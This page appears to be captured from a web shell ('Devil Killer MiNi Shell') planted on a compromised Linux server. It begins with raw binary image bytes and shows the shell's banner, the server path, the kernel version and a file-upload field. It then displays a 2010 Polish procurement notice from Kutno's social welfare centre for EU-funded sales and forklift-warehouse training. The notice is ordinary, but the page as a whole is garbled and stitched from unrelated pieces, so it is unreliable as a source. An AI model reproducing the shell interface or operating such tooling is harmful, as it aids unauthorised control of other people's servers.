JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100510/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100510/126896-N-2010.html

<p class="kh_header"><b>Kutno: Organizacja i przeprowadzenie szkoleń współfinansowanych przez Unię Europejską ze środków Europejskiego Funduszu Społecznego realizowanych w ramach projektu systemowego Otwórz się na siebie-  dla 42 osób z terenu miasta Kutna. Szkolenia są prowadzone w formie kursów  w następujących zakresach tematycznych, z których każdy stanowi odrębny moduł:
Moduł I - Profesjonalny sprzedawca z obsługą komputera i kasy fiskalnej oraz umiejętnością fakturowania.
Moduł II - Nowoczesny magazynier z uprawnieniami na wózki jezdniowe wysokiego składowania, obsługę kas fiskalnych oraz komputerowych programów mag</b><br>
<b>Numer ogłoszenia: 126896 - 2010; data zamieszczenia: 10.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Warszawskie Przedmieście 10a, 99-300 Kutno, woj. łódzkie, tel. 024 25374 80, faks 024 25374 80.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.kutno.bip-jst.pl/index.php?grupa=38767</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie szkoleń współfinansowanych przez Unię Europejską ze środków Europejskiego Funduszu Społecznego realizowanych w ramach projektu systemowego Otwórz się na siebie-  dla 42 osób z terenu miasta Kutna. Szkolenia są prowadzone w formie kursów  w następujących zakresach tematycznych, z których każdy stanowi odrębny moduł:
Moduł I - Profesjonalny sprzedawca z obsługą komputera i kasy fiskalnej oraz umiejętnością fakturowania.
Moduł II - Nowoczesny magazynier z uprawnieniami na wózki jezdniowe wysokiego składowania, obsługę kas fiskalnych oraz komputerowych programów mag.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem Zamówienia są szkolenia grupowe dla 42 beneficjentów ostatecznych
w zakresach:
Moduł I:
- czas trwania szkolenia:szkolenie winno być przeprowadzone dla grupy 21 osobowej w terminie do 30.08.2010r.
-  liczba godzin szkolenia: co najmniej 150 godzin zegarowych na jednego uczestnika, nie więcej niż 3,5 godziny dziennie,
- zajęcia bedą odbywać się w godzinach 16.00-19.30 od poniedziałku do piątku /3,5 godziny dziennie łacznie z przerwami kawowymi/,
- zajęcia praktyczne łącznie z teorią,
- miejsce odbywania szkolenia: teren miasta Kutna /ze wskazaniem na centrum miasta celem ograniczenia konieczności dojazdu/,
- zakres tematyczny szkolenia: nabycie umiejętności profesjonalnej obsługi klienta oraz pracy z kasą fiskalną i systemami kasowo - komputerowymi również umiejętności fakturowania. Zakres szkolenia powinien być opracowany na bazie standardów kwalifikacji i szkoleń Ministerstwa Pracy i Polityki Społecznej znajdujących się na stronie www.standardyiszkolenia.praca.gov.pl.
- Szkolenie powinno obejmować co najmniej następujące bloki:

a.organizacja zaopatrzenia,
b.dokumentacja zakupu i sprzedaży,
c.obsługa komputera,
d.organizacja i zasady sprzedaży,
e.profesjonalna obsługa klienta,
f.obsługa kas fiskalnych,
g.przyjmowanie dostaw towarów,
h.system kasowo - komputerowy i fakturowanie komputerowe,
i.BHP w jednostce handlu w gospodarce rynkowej.

W cenę szkolenia należy wliczyć:
a.ubezpieczenie;
b.badania lekarskie - przed rozpoczęciem szkolenia wykonawca zobowiązany jest przeprowadzić badania sanitarno epidemiologiczne zgodnie z Rozporządzeniem Ministra Zdrowia z dnia 2 lutego 2006r. Dz. U. NR. 25 poz. 191  w sprawie badań do celów sanitarno - epidemiologicznych. Koszt badań i książeczki zdrowia dla celów sanitarno epidemiologicznych winny być ujęte w cenie oferty,
c.materiały szkoleniowe - wykonawca winien zapewnić: skrypty, materiały dotyczące szkolenia,
d. serwis kawowy i poczęstunek /słodki poczęstunek lub przygotowanie kanapek/.
Szkolenie powinno zakończyć się egzaminem.
Po zakończeniu szkolenia beneficjenci ostateczni otrzymają następujące dokumenty:
Zaświadczenie o jego ukończeniu zgodnie z rozporządzeniem Ministra Edukacji i Nauki z dnia 3 lutego 2006 r.w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216).
Certyfikat o ukończeniu szkolenia z kolorowymi logotypami: Programu Operacyjnego Kapitał Ludzki Narodowa Strategia Spójności, Unii Europejskiej z odniesieniem Europejski Fundusz Społeczny, Instytucji Pośredniczącej 2 Stopnia tj. Wojewódzkiego Urzędu Pracy w Łodzi oraz Realizatora Projektu Miejskiego Ośrodka Pomocy Społecznej w Kutnie.
Zaświadczenie lekarskie z badań profilaktycznych i specjalistycznych wymaganych do podjęcia zatrudnienia zgodnie z rodzajem zawodu i obowiązującymi przepisami prawa.
Kopie w/w dokumentów Wykonawca ma obowiązek dostarczyć do siedziby Zamawiającego w terminie 5 dni od ukończenia szkolenia.


Moduł II:

- czas trwania szkolenia:szkolenie winno być przeprowadzone dla grupy 21 osobowej w terminie do  30.08.2010r.
- liczba godzin szkolenia - co najmniej 150 godzin w tym zajęcia praktyczne 100 godzin na jednego uczestnika nie więcej niż 3,5 godziny dziennie,
- zajęcia bedą odbywać się w godzinach 16.00-19.30 od poniedziałku do piątku /3,5 godziny dziennie łacznie z przerwami kawowymi/,
- zajęcia praktyczne łącznie z teorią,
- miejsce odbywania szkolenia: teren miasta Kutna /ze wskazaniem na centrum miasta celem ograniczenia konieczności dojazdu/,
Celem szkolenia jest przygotowanie uczestników do pracy w zawodzie nowoczesny magazynier w : magazynach, hurtowniach, sklepach oraz w innych zakładach produkcyjnych na stanowisko pracownika magazynowego, kierowcy wózka widłowego, kasjera, pracownika hurtowni itp.
        - Szkolenie powinno obejmować co najmniej następujące bloki - zakres szkolenia powinien być opracowany na bazie standardów kwalifikacji i szkoleń Ministerstwa Pracy i Polityki Społecznej znajdujących się na stronie www.standardyiszkolenia.praca.gov.pl:
a.budowle magazynowe; wyposażenie;
b.gospodarka magazynowa;
c.elementy towaroznawstwa;
d.organizacja prac magazynowych - dokumentacja handlowa;
e.psychologia sprzedaży - trening umiejętności obsługi klienta;
f.technologia prac magazynowych - elementy zarządzania materiałami;
g.elementy logistyki i marketingu;
h.przepisy BHP i p. pożarowe;
i.obsługa komputerowych programów handlowo - magazynowych używanych w magazynie;
j.obsługa wózków jezdniowych /szkolenie w zakresie obsługi wózka jezdniowego winno być realizowane zgodnie z programem nauczania zarejestrowanym pod Nr 569/VI/2002 w ODK Ministerstwa Gospodarki w Mysłowicach/;
k.obsługa kas fiskalnych i urządzeń współpracujących;
l.obsługa wózków jezdniowych - praktyczna nauka jazdy.
 Szkolenie w zakresie wyżej wskazanym powinno zakończyć się egzaminem państwowym.
           
W cenę szkolenia należy wliczyć: 
a.ubezpieczenie; 
b.badania lekarskie - przed rozpoczęciem szkolenia wykonawca zobowiązany jest przeprowadzić badania profilaktyczne oraz psychologiczne w zakresie braku przeciwwskazań do wykonywania zawodu. Koszty badań, zaświadczeń  winny być ujęte w cenie oferty,
c.materiały szkoleniowe, 
d.serwis kawowy i poczęstunek /słodki poczęstunek lub przygotowanie kanapek/.
Po zakończeniu szkolenia uczestnicy otrzymają następujące dokumenty:
a.Uczestnicy szkolenia winni otrzymać zaświadczenia o ukończeniu zgodnie z § 6 rozporządzenia Ministra Edukacji i Nauki z dnia 3 lutego 2006r w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych ( Dz. U. Nr 31, poz. 216 ).

b. Certyfikat o ukończeniu szkolenia z kolorowymi logotypami: Programu Operacyjnego Kapitał Ludzki Narodowa Strategia Spójności, Unii Europejskiej z odniesieniem Europejski Fundusz Społeczny, Instytucji Pośredniczącej 2 Stopnia tj. Wojewódzkiego Urzędu Pracy w Łodzi oraz Realizatora Projektu Miejskiego Ośrodka Pomocy Społecznej w Kutnie.

   c. Świadectwo lekarskie wystawione przez lekarza uprawnionego do wykonywania badań    profilaktycznych; orzeczenie psychologiczne o braku przeciwwskazań do wykonywania w/w    zawodu.

d. Po ukończeniu szkolenia uczestnicy winni posiadać uprawnienia do obsługi wózka jezdniowego wysokiego składowania, zgodnie z: Rozporządzeniem Ministra Gospodarki z dnia 10 maja 2002 r.  w sprawie bezpieczeństwa i higieny pracy przy użytkowaniu wózków jezdniowych z napędem silnikowym /Dz. U. nr 70, poz. 650 zm.Dz.U. z 2003 r.Nr 65, poz.603./, Rozporządzeniem Ministra Gospodarki z dnia 20 września 2001r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i urządzeń technicznych do robót ziemnych budowlanych i drogowych (Dz.U nr 118, poz.1263). 
     e. Zdać egzamin państwowy.
     Ponadto uczestnicy szkolenia winni obsługiwać kasę fiskalną, programy magazynowe, znać zasady gospodarki magazynowej.



Kopie w/w dokumentów Wykonawca ma obowiązek dostarczyć do siedziby Zamawiającego            w terminie 5 dni od ukończenia szkolenia.



Każdy z uczestników szkolenia winien prowadzić i wypełniać kartę zajęć praktycznych zgodnie z programem szkolenia, potwierdzoną przez instruktora zajęć praktycznych. W ramach zajęć praktycznych uczestnik szkolenia winien wykonać odpowiednio: obsługę programów magazynowych, wzorów dokumentów magazynowych, kas fiskalnych, wózka widłowego etc. 


II 1.4.  W czasie trwania zajęć należy zapewnić serwis kawowy i poczęstunek min.2 razy w czasie trwania zajęć.
(Pod pojęciem serwisu kawowego w czasie 1 dnia szkolenia dla 1 grupy należy rozumieć:
- maszyny do parzenia kawy, kawa wydawana z maszyn do parzenia kawy, lub termosy z gorącą wodą lub termosy z gotową kawą, kawa mielona w pojemnikach lub rozpuszczalna min.6 łyzeczek na osobę, naczynia jednorazowego użytku - filiżanki nie mniej niż 3 sztuki na osobę, mieszadełka - nie mniejniż 3 sztuki na osobę, cukier w saszetkach jednorazowych - nie mniej niż 6 sztuk na osobę, śmietanka do kawy w płynie w pojemnikach jednorazowych - nie mniej niż 3 sztuki na osobę,  serwetki jednorazowe; w/w produkty spożywcze winny być najwyższej jakości;
- czajnik elektryczny lub maszyna do parzenia herbaty, herbata w saszetkach jednorazowych pakowana oddzielnie o różnych smakach (herbata czarna owocowa, herbata czarna zwykła) - nie mniej niż 3 sztuki na osobę, naczynia jednorazowego użytku,
- kubki - nie mniej niż 3 sztuki na osobę, mieszadełka - nie mniej niż 3 sztuki na osobę, cukier w saszetkach jednorazowych - nie mniej niż 6 sztuk na osobę, serwetki jednorazowe; w/w produkty spożywcze oraz naczynia jednarazowego użytku winny być najwyższej jakości;
- mieszanka ciastek:  (nie mniej niż 10 sztuk na osobę dziennie)  lub kanapki (1 bułka lub 2 kromki chleba na osobę,  masło, wędlina, ser, warzywa). .
- woda mineralna /gazowana i niegazowana/ w butelkach plastikowych, zakręcanych o poj. 500 ml., nie mniej niż 1 sztuka na osobę dziennie.

Serwis kawowy winien być przygotowywany do wyczerpania potrzeb beneficjentów ostatecznych. Produkty podawane podczas serwisu kawowego winny spełniać normy żywieniowe oraz sanitarno-epidemiologiczne.
W zakres organizacji przerw kawowych wchodzi również zapewnienie przez wykonawcę osoby do: obsługi urządzeń do parzenia kawy i herbaty lub uzupełniania gorącej wody w termosach oraz przygotowania stołu z poczęstunkiem, sprzątania pomieszczeń po zajęciach).
Zamawiajacy żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.51.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>5.1 O udzielenie zamówienia publicznego mogą się ubiegać wykonawcy, którzy spełniają warunki udziału określone w art 22 ust 1 ustawy Prawo zamówień publicznych dotyczące: 
5.1.1 posiadania uprawnień do wykonywania określonej działalności lub czynności jeżeli  przepisy prawa nakładają obowiązek ich posiadania;
5.1.2 posiadania niezbędnej wiedzy i doświadczenia;
5.1.3 dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, to jest;
a) wykażą, że wykonali w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie co najmniej:
w przypadku oferty na jeden moduł - 3 szkolenia, których wartość brutto łącznie wynosiła co najmniej 6 000 zł,
w przypadku oferty na wszystkie moduły - 5 szkoleń, których wartość brutto łącznie wynosiła co najmniej 20 000 zł.
w zakresie tożsamym z przedmiotem zamówienia oraz załączą dokumenty potwierdzające, że usługi zostały wykonane należycie;
b) wykażą, że dysponują osobami, które będą uczestniczyć
w wykonywaniu zamówienia posiadajacymi kwalifikacje zawodowe, doświadczenie 
i wykształcenie niezbędne do wykonania zamówienia (umożliwiajace realizację programu szkolenia będącego przedmiotem zamówienia),tj:
zajęcia teoretyczne winny być prowadzone przez osoby z: wykształceniem wyższym magisterskim z uprawnieniami pedagogicznymi do wykładów przedmiotów zawodowych lub wykształceniem inżynierskim z uprawnieniami pedagogicznymi do wykładów przedmiotów zawodowych. 
Zajęcia praktyczne winny być prowadzone przez osoby z  uprawnieniami do prowadzenia praktycznej nauki zawodu. 
Nadzór nad całością zajęć praktycznych winien sprawować osoba z wykształceniem wyższym.

c) dysponują niezbędnymi do wykonania zamówienia narzędziami 
i urządzeniami, tj:
wykonawca winien zapewnić odpowiednie warunki lokalowe. Zajęcia teoretyczne powinny odbywać się w salach dydaktycznych wyposażonych w odpowiednie oprzyrządowanie techniczne, w tym aparatura audiowizualna, kserokopiarka, rzutnik pisma, tablica naścienna lub informacyjna, biurka, krzesła. 
Wykonawca winien zapewnić odpowiednią ilość sprzętu komputerowego, wózków widłowych, kas fiskalnych umożliwiających swobodne uczestnictwo każdego kursanta w zajęciach praktyczno - dydaktycznych. 
5.1.4 sytuacji ekonomicznej i finansowej;
5.1.5 wykonawca musi wykazać brak podstaw do wykluczenia z postępowania z powodu niespełniania warunków, o których mowa w art. 24 ust.1 ustawy;
5.1.6 Zamawiający dokona oceny spełniania warunków udziału w postepowaniu w oparciu
o dokumenty i oświadczenia jakich żąda, zgodnie z formułą spełnia-nie spełnia.
Określone przez Zamawiającego wymagania, jakie mają spełniać oferowane usługi:
oferowane przez Wykonawcę usługi winny być w części dotyczącej zajęć teoretycznych przeprowadzane w centrum Miasta Kutna w obrębie obszaru wyznaczonego na mapce stanowiacej załącznik Nr 1 do siwz.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) oświadczenie wykonawcy o spełnianiu warunków okreslonych w art. 22 ust. 1 pkt-1-4 ustawy - załącznik nr 4,
2) wykaz wykonanych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom lub usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców - według wzoru stanowiącego załącznik Nr 5 do siwz,
3) dokumenty - referencje potwierdzające, że usługi te zostały wykonane należycie;
4) wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń technicznych dostępnych wykonawcy wraz z informacją o podstawie dysponowania tymi zasobami, według wzoru stanowiącego załącznik Nr 6 do siwz;
5) pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie, o którym mowa w pkt 4, wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował;
6) wykaz osób,  które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności wraz z informacją o podstawie do dysponowania tymi zasobami, według wzoru stanowiącego załącznik Nr 7 do siwz;
7) pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jezeli w wykazie, o którym mowa w pkt 6, wykonawca wskazał osoby, którymi bedzie dysponował;
8) wypełniony druk Podwykonawstwo - zał. Nr 8 do siwz - jeśli dotyczy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca winien zapewnić odpowiednie warunki lokalowe. Zajęcia teoretyczne powinny odbywać się w salach dydaktycznych wyposażonych w odpowiednie oprzyrządowanie techniczne, w tym aparatura audiowizualna, kserokopiarka, rzutnik pisma, tablica naścienna lub informacyjna, biurka, krzesła. 
Wykonawca winien zapewnić odpowiednią ilość sprzętu komputerowego, wózków widłowych, kas fiskalnych umożliwiających swobodne uczestnictwo każdego kursanta w zajęciach praktyczno - dydaktycznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. wykaz osób,  które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności wraz z informacją o podstawie do dysponowania tymi zasobami, według wzoru stanowiącego załącznik Nr 7 do siwz;
2. pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jezeli w wykazie, o którym mowa w pkt 6, wykonawca wskazał osoby, którymi bedzie dysponował;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykażą, że wykonali w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie co najmniej:
w przypadku oferty na jeden moduł - 3 szkolenia, których wartość brutto łącznie wynosiła co najmniej 6 000 zł,
w przypadku oferty na wszystkie moduły - 5 szkoleń, których wartość brutto łącznie wynosiła co najmniej 20 000 zł.
w zakresie tożsamym z przedmiotem zamówienia oraz załączą dokumenty potwierdzające, że usługi zostały wykonane należycie;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

